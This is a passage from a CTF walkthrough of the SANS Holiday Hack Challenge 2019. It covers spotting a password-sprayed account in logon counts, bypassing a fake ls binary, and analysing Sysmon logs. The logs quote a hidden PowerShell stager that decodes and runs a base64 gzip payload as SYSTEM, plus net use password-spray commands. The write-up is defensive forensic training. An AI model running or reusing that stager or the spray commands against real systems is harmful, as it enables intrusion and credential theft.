77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ltrufflefig&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;lstripyleaves&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;hevergreen&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;hcandysnaps&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;gchocolatewine&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;gcandyfluff&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ftwinklestockings&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;ftinseltoes&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;esparklesleigh&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;dsparkleleaves&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;cstripyfluff&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;cjinglebuns&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;civysparkles&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;civypears&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bevergreen&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;bbrandyleaves&amp;lt;/Data&amp;gt;
77 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;Administrator&amp;lt;/Data&amp;gt;
76 &amp;lt;Data Name=&amp;quot;TargetUserName&amp;quot;&amp;gt;supatree&amp;lt;/Data&amp;gt;
&lt;/pre&gt;
&lt;p&gt;We can see that &lt;code&gt;supatree&lt;/code&gt; has one less failed authentication attempt.
This must means that it's the account that was compromised by the password
spray attack.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-4"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id8"&gt;Objective 4:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="sugarplum-mary-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id9"&gt;SugarPlum Mary's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're supposed to list the content of the current directory:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;K000K000K000KK0KKKKKXKKKXKKKXKXXXXXNXXXX0kOKKKK0KXKKKKKKK0KKK0KK0KK0KK0KK0KK0KKKKKK&lt;/span&gt;
&lt;span class="go"&gt;00K000KK0KKKKKKKKKXKKKXKKXXXXXXXXNXXNNXXooNOXKKXKKXKKKXKKKKKKKKKK0KKKKK0KK0KK0KKKKK&lt;/span&gt;
&lt;span class="go"&gt;KKKKKKKKKKKXKKXXKXXXXXXXXXXXXXNXNNNNNNK0x:xoxOXXXKKXXKXXKKXKKKKKKKKKKKKKKKKKKKKKKKK&lt;/span&gt;
&lt;span class="go"&gt;K000KK00KKKKKKKKXXKKXXXXNXXXNXXNNXNNNNNWk.ddkkXXXXXKKXKKXKKXKKXKKXKKXK0KK0KK0KKKKKK&lt;/span&gt;
&lt;span class="go"&gt;00KKKKKKKKKXKKXXKXXXXXNXXXNXXNNNNNNNNWXXk,ldkOKKKXXXXKXKKXKKXKKXKKKKKKKKKK0KK0KK0XK&lt;/span&gt;
&lt;span class="go"&gt;KKKXKKKXXKXXXXXNXXXNXXNNXNNNNNNNNNXkddk0No,;;:oKNK0OkOKXXKXKKXKKKKKKKKKKKKK0KK0KKKX&lt;/span&gt;
&lt;span class="go"&gt;0KK0KKKKKXKKKXXKXNXXXNXXNNXNNNNXxl;o0NNNo,,,;;;;KWWWN0dlk0XXKKXKKXKKXKKKKKKKKKKKKKK&lt;/span&gt;
&lt;span class="go"&gt;KKKKKKKKXKXXXKXXXXXNXXNNXNNNN0o;;lKNNXXl,,,,,,,,cNNNNNNKc;oOXKKXKKXKKXKKXKKKKKKKKKK&lt;/span&gt;
&lt;span class="go"&gt;XKKKXKXXXXXXNXXNNXNNNNNNNNN0l;,cONNXNXc&amp;#39;,,,,,,,,,KXXXXXNNl,;oKXKKXKKKKKK0KKKKK0KKKX&lt;/span&gt;
&lt;span class="go"&gt;KKKKKKXKKXXKKXNXXNNXNNNNNXl;,:OKXXXNXc&amp;#39;&amp;#39;&amp;#39;,,&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;,KKKKKKXXK,,;:OXKKXKKXKKX0KK0KK0KKK&lt;/span&gt;
&lt;span class="go"&gt;KKKKKKKKXKXXXXXNNXXNNNNW0:;,dXXXXXNK:&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;cKKKKKKKXX;,,,;0XKKXKKXKKXKKK0KK0KK&lt;/span&gt;
&lt;span class="go"&gt;XXKXXXXXXXXXXNNNNNNNNNN0;;;ONXXXXNO,&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;x0KKKKKKXK,&amp;#39;,,,cXXKKKKKKKKXKKK0KKKX&lt;/span&gt;
&lt;span class="go"&gt;KKKKKKKXKKXXXXNNNNWNNNN:;:KNNXXXXO,&amp;#39;.&amp;#39;..&amp;#39;.&amp;#39;&amp;#39;..&amp;#39;:O00KKKKKXd&amp;#39;&amp;#39;,,,,KKXKKXKKKKKKKKKKKKK&lt;/span&gt;
&lt;span class="go"&gt;KKKKKXKKXXXXXXXXNNXNNNx;cXNXXXXKk,&amp;#39;&amp;#39;&amp;#39;.&amp;#39;&amp;#39;.&amp;#39;&amp;#39;&amp;#39;&amp;#39;.,xO00KKKKKO,&amp;#39;&amp;#39;,,,,KK0XKKXKKK0KKKKKKKK&lt;/span&gt;
&lt;span class="go"&gt;XXXXXXXXXKXXXXXXXNNNNNo;0NXXXKKO,&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;.&amp;#39;.&amp;#39;.;dkOO0KKKK0;.&amp;#39;&amp;#39;,,,,XXXKKK0KK0KKKKKKKKX&lt;/span&gt;
&lt;span class="go"&gt;XKKXXKXXXXXXXXXXXNNNNNcoNNXXKKO,&amp;#39;&amp;#39;&amp;#39;&amp;#39;.&amp;#39;......:dxkOOO000k,..&amp;#39;&amp;#39;&amp;#39;,,lNXKXKKXKKK0KKKXKKKK&lt;/span&gt;
&lt;span class="go"&gt;KXXKKXXXKXXKXXXXXXXNNNoONNXXX0;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;&amp;#39;..&amp;#39;lkkkkkkxxxd&amp;#39;...&amp;#39;&amp;#39;&amp;#39;&amp;#39;,0N0KKKKKXKKKKKK0XKKK&lt;/span&gt;
&lt;span class="go"&gt;XXXXXKKXXKXXXXXXXXXXXXOONNNXXl,,;;,;;;;;;;d0K00Okddoc,,,,,,,,,xNNOXKKKKKXKKKKKKKXKK&lt;/span&gt;
&lt;span class="go"&gt;XXXXXXXXXXXXXXXXXXXXXXXONNNXx;;;;;;;;;,,:xO0KK0Oxdoc,,,,,,,,,oNN0KXXKKXKKXKKKKKKKXK&lt;/span&gt;
&lt;span class="go"&gt;XKXXKXXXXXXXXXXXXXXXXXXXXWNX:;;;;;;;;;,cO0KKKK0Okxl,,,,,,,,,oNNK0NXXXXXXXXXKKKKKKKX&lt;/span&gt;
&lt;span class="go"&gt;XXXXXXXXXXXXXXXXXXXXXXXNNNWNc;;:;;;;;;xKXXXXXXKK0x,,,,,,,,,dXNK0NXXXXXXXXXXXKKXKKKK&lt;/span&gt;
&lt;span class="go"&gt;XKXXXXXXXXXXXXXXXXXXXXNNWWNWd;:::;;;:0NNNNNNNNNXO;,,,,,,,:0NN0XNXNXXXXXXXXXXXKKXKKX&lt;/span&gt;
&lt;span class="go"&gt;NXXXXXXXXXXXXXXXXXXXXXNNNNNNNl:::;;:KNNNNNNNNNNO;,,,,,,;xNNK0NXNXXNXXXXXXKXXKKKKXKK&lt;/span&gt;
&lt;span class="go"&gt;XXNNXNNNXXXXXXXXXXXXXNNNNNNNNNkl:;;xWWNNNNNWWWk;;;;;;;xNNKKXNXNXXNXXXXXXXXXXXKXKKXK&lt;/span&gt;
&lt;span class="go"&gt;XXXXXNNNNXNNNNXXXXXXNNNNNNNNNNNNKkolKNNNNNNNNx;;;;;lkNNXNNNNXXXNXXNXXXXXXXXXXXKKKKX&lt;/span&gt;
&lt;span class="go"&gt;XXXXXXXXXXXNNNNNNNNNNNNNNNNNNNNNNNNNKXNNNNWNo:clxOXNNNNNNNNXNXXXXXXXXXXXXXXXKKXKKKK&lt;/span&gt;
&lt;span class="go"&gt;XXXXNXXXNXXXNXXNNNNNWWWWWNNNNNNNNNNNNNNNNNWWNWWNWNNWNNNNNNNNXXXXXXNXXXXXXXXXXKKXKKX&lt;/span&gt;
&lt;span class="go"&gt;XNXXXXNNXXNXXNNXNXNWWWWWWWWWNNNNNNNNNNNNNWWWWNNNNNNNNNNNNNNNNNNNNNXNXXXXNXXXXXXKXKK&lt;/span&gt;
&lt;span class="go"&gt;XXXXNXXNNXXXNXXNXXNWWWNNNNNNNNNWWNNNNNNNNWWWWWWNWNNNNNNNNNNNNNNNXXNXNXXXXNXXXXKXKXK&lt;/span&gt;
&lt;span class="go"&gt;I need to list files in my home/&lt;/span&gt;
&lt;span class="go"&gt;To check on project logos&lt;/span&gt;
&lt;span class="go"&gt;But what I see with ls there,&lt;/span&gt;
&lt;span class="go"&gt;Are quotes from desert hobos...&lt;/span&gt;
&lt;span class="go"&gt;which piece of my command does fail?&lt;/span&gt;
&lt;span class="go"&gt;I surely cannot find it.&lt;/span&gt;
&lt;span class="go"&gt;Make straight my path and locate that-&lt;/span&gt;
&lt;span class="go"&gt;I&amp;#39;ll praise your skill and sharp wit!&lt;/span&gt;
&lt;span class="go"&gt;Get a listing (ls) of your current directory.&lt;/span&gt;
&lt;span class="gp"&gt;elf@ffba3960c30f:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, let's just &lt;code&gt;ls&lt;/code&gt; the directory:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ffba3960c30f:~$&lt;/span&gt; ls
&lt;span class="go"&gt;This isn&amp;#39;t the ls you&amp;#39;re looking for&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, weird. It looks like the &lt;code&gt;ls&lt;/code&gt; binary was replaced. Let's see which
program is used using the &lt;code&gt;which&lt;/code&gt; command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ffba3960c30f:~$&lt;/span&gt; which ls
&lt;span class="go"&gt;/usr/local/bin/ls&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Indeed, it does not seem to be the usual &lt;code&gt;ls&lt;/code&gt; binary. Let's search for
every file named &lt;code&gt;ls&lt;/code&gt; at the root of the file system:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ffba3960c30f:~$&lt;/span&gt; find / -name ls -type f &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt;/dev/null
&lt;span class="go"&gt;/usr/local/bin/ls&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;/bin/ls&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The usual &lt;code&gt;ls&lt;/code&gt; binary seems to be at &lt;code&gt;/bin/ls&lt;/code&gt;. So let's call this
binary directly:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ffba3960c30f:~$&lt;/span&gt; /bin/ls
&lt;span class="go"&gt;&amp;#39; &amp;#39;   rejected-elfu-logos.txt&lt;/span&gt;
&lt;span class="go"&gt;Loading, please wait......&lt;/span&gt;



&lt;span class="go"&gt;You did it! Congratulations!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="windows-log-analysis-determine-attacker-technique"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id10"&gt;Windows Log Analysis: Determine Attacker Technique&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're given &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/sysmon-data.json.zip"&gt;Sysmong logs&lt;/a&gt;
to try and understand which technique the attacker used. We're asked to
identify what tool the attacker used to retrieve domain password hashes from
the &lt;code&gt;lsass.exe&lt;/code&gt; process.&lt;/p&gt;
&lt;p&gt;In these logs, we have a lot of interesting events. We can see the execution of
suspicious PowerShell commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;command_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \&amp;quot;if([IntPtr]::Size -eq 4){$b=&amp;#39;powershell.exe&amp;#39;}else{$b=$env:windir+&amp;#39;\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe&amp;#39;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&amp;#39;-noni -nop -w hidden -c &amp;amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(&amp;#39;&amp;#39;H4sIACHe010CA7VWbW/aSBD+nEj5D1aFZFshGANt2kiVbs07wQnEQCAUnTb22iysvWCvCabtf78x4DS9plV70ll5We/OzM4888yM3TiwBeWBhEsD6fPZ6UkPh9iXlBy13w3yUi5h60A9OYGDnN2VPkrKFK1WNe5jGsyurqpxGJJAHN4LTSJQFBH/kVESKar0Rbqfk5Bc3D4uiC2kz1Lu70KT8UfMjmJJFdtzIl2gwEnPutzGqS8Fa8WoUORPn2R1eqHPCvV1jFmkyFYSCeIXHMZkVfqqphcOkhVRZJPaIY+4Kwr3NCiXCsMgwi65AWsbYhIx504kqxAD/IRExGEgQTSp+uFQkWHZC7mNHCckUSTnpWlqeDqb/aVMj7fexYGgPim0A0FCvrJIuKE2iQotHDiM3BF3BlqWCGngzVQVxDZ8SZRcEDOWl/7EjHJDnjLMfldJeakEUj0RqnnI4g9RmtyJGTnoya+4uc+7Ck+We4Dt69np2ambEYWuX/IEVifT/ZqAa0qPR3Qv9VEq5iUTrsGChwm85gZhTNTZM7BSbuHkf66tZ6IguClh2JmOOHVmoHFMZM63rGa6/3NC1ohLA1JLAuxTO+Oc8hq+xGVkH14hE7sBnxT5eECcGmHEwyLFLE3zD2p1n4pnXSOmzCEhsiFHEXgF6VO/d+aQBkVuBybxAaDDO/Au5wLTSSZ9ZHeS3Z6+g5BcZTiK8lIvhlKz85JFMCNOXkJBRI9HKBZ8v5S/uWvGTFAbRyIzN1MzHI/3VXkQiTC2IWcQ+8BaEZtilkKRl1rUIUZiUS+7V34ViCpmDEoALG0gEbCTAmCJlAkhuAhZVwsWEW1/xYgPEvuKbzDsQX0fab4nDvaII//bv4zIB9amSGQQvPAO0msxLvLSiIYCGkeKKlDov9z9ol/svaiG5JgFJauLqZGIlM+5qDRItikfj5jsEQgFRN8IuW/giLyrHNqD8ka7pVUEz6QdMNM2llRHT1Rvm/A7pOU2r106151FSwtr27mL2lHbbPVq/VarsulYo4qw6m1x3WsLsz5eLCzUuhtOxEMbtQa0uJxUdqsO3Vld5Ey22rudsXsqGtvdwnPcSc11vUvXutPfNmj3vto3iiXcrdXj7r3xZBQrUZ0+tfp02F92GuJxMmJ46GreWP+A6bYbLkY6N3dthJrzsr3ruKPm3HSSSYuShVbs0j7qI3Rt3w2HTW/lNSOkfRitq/4CrRsYYdRG9VHSecuM/rBhoGHd6ONb3iuf1zT9wVnXGw9j3PGZ02xp+mSMHBRqA2+uX97OgxQn7BlrI5VB3YekoYFMr4JalRLdPaz7TQ/VQWbkc4QbdDk8H4PNmwHo3A91hyMRtMeaNvI0D7nWfIKRAdLGGjUMXk3e98yeNhqV5vrjUp+Dz2S8eW920HnD7mmadu4/wl8N2eZqG4yNp8uN17L4Nb7Go81DWdMHT00XrdH5uaEbj6JVL3c2cO9A+zD8+CYlEDAoZ/PhC1r8rJWbOIzmmAFdoEtnBdrgYePYd3ucphqKkg7qJQkDwmDQwSjMaI4Y43ba9KFBw7g5DIF0Jg1hWS69ulKlZ0H12zDItq6uHsBFqJs9tQtdEnhini9uy8UiNPfitlKEEH8/ripfJcrBVj6dDikwz8bZ3riaVlTONd/q1v8K2bGO5/DP+TVk3/Z+cfpbMBbz+4B/2P1+448Q/dOw7zEVIGhBD2LkMAFfi/7IjRdfB/uMQObd45N+293G4uIGvhrOTv8BxRZ9dEQKAAA=&amp;#39;&amp;#39;))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&amp;#39;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&amp;#39;Hidden&amp;#39;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;event_type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;process&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;logon_id&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;999&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;?&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;?&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3468&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;616&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\System32\\cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;subtype&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;create&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;timestamp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;132110784202880000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-7e14-5d60-0000-0010bffd2500}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{00000000-0000-0000-0000-000000000000}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY\\SYSTEM&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_domain&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SYSTEM&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Or the password spray attacks:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="nt"&gt;&amp;quot;command_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;net  use \\\\127.0.0.1\\IPC$ /user:ELFU\\bbrandyleaves ???Summer2019  &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;    &lt;span class="nt"&gt;&amp;quot;event_type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;process&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;logon_id&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;999&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\SysWOW64\\cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;752&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1072&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;net.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\SysWOW64\\net.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;subtype&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;create&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;timestamp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;132186397042689984&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-de58-5dd3-0000-0010d9b82600}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-de52-5dd3-0000-0010dea72600}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY\\SYSTEM&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_domain&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SYSTEM&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="nt"&gt;&amp;quot;command_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;net  use \\\\127.0.0.1\\IPC$ /user:ELFU\\bevergreen ???Summer2019  &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;    &lt;span class="nt"&gt;&amp;quot;event_type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;process&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;logon_id&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;999&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\SysWOW64\\cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;724&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1072&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;net.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\SysWOW64\\net.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
